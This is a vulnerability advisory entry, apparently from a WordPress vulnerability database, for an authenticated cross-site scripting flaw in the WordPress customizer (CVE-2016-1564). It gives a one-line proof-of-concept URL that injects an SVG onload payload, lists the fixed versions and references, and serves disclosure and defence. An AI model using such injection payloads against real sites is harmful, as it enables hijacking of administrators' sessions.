WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)



Proof of Concept
http://www.example.com/wp-admin/customize.php?theme=<svg onload=alert(1)> (source: https://twitter.com/brutelogic/status/685105483397619713)

Affects WordPresses

fixed in version 4.4.1
fixed in version 4.3.2
fixed in version 4.3.2
fixed in version 4.3.2
fixed in version 4.2.6
fixed in version 4.2.6
fixed in version 4.2.6
fixed in version 4.2.6
fixed in version 4.2.6
fixed in version 4.2.6
fixed in version 4.2.6
fixed in version 4.1.9
fixed in version 4.1.9
fixed in version 4.1.9
fixed in version 4.1.9
fixed in version 4.1.9
fixed in version 4.1.9
fixed in version 4.1.9
fixed in version 4.1.9
fixed in version 4.1.9
fixed in version 4.1.9
fixed in version 4.0.9
fixed in version 4.0.9
fixed in version 4.0.9
fixed in version 4.0.9
fixed in version 4.0.9
fixed in version 4.0.9
fixed in version 4.0.9
fixed in version 4.0.9
fixed in version 4.0.9
fixed in version 4.0.9
fixed in version 3.9.10
fixed in version 3.9.10
fixed in version 3.9.10
fixed in version 3.9.10
fixed in version 3.9.10
fixed in version 3.9.10
fixed in version 3.9.10
fixed in version 3.9.10
fixed in version 3.9.10
fixed in version 3.9.10
fixed in version 3.9.10
fixed in version 3.8.12
fixed in version 3.8.12
fixed in version 3.8.12
fixed in version 3.8.12
fixed in version 3.8.12
fixed in version 3.8.12
fixed in version 3.8.12
fixed in version 3.8.12
fixed in version 3.8.12
fixed in version 3.8.12
fixed in version 3.8.12
fixed in version 3.8.12
fixed in version 3.7.12
fixed in version 3.7.12
fixed in version 3.7.12
fixed in version 3.7.12
fixed in version 3.7.12
fixed in version 3.7.12
fixed in version 3.7.12
fixed in version 3.7.12
fixed in version 3.7.12
fixed in version 3.7.12
fixed in version 3.7.12
fixed in version 3.7.12

References

CVE 2016-1564
URL https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
URL https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 15097
Verified Yes
WPVDB ID 8358

Timeline

Publicly Published 2016-01-06 (almost 4 years ago)
Added 2016-01-06 (almost 4 years ago)
Last Updated 2018-08-29 (about 1 year ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin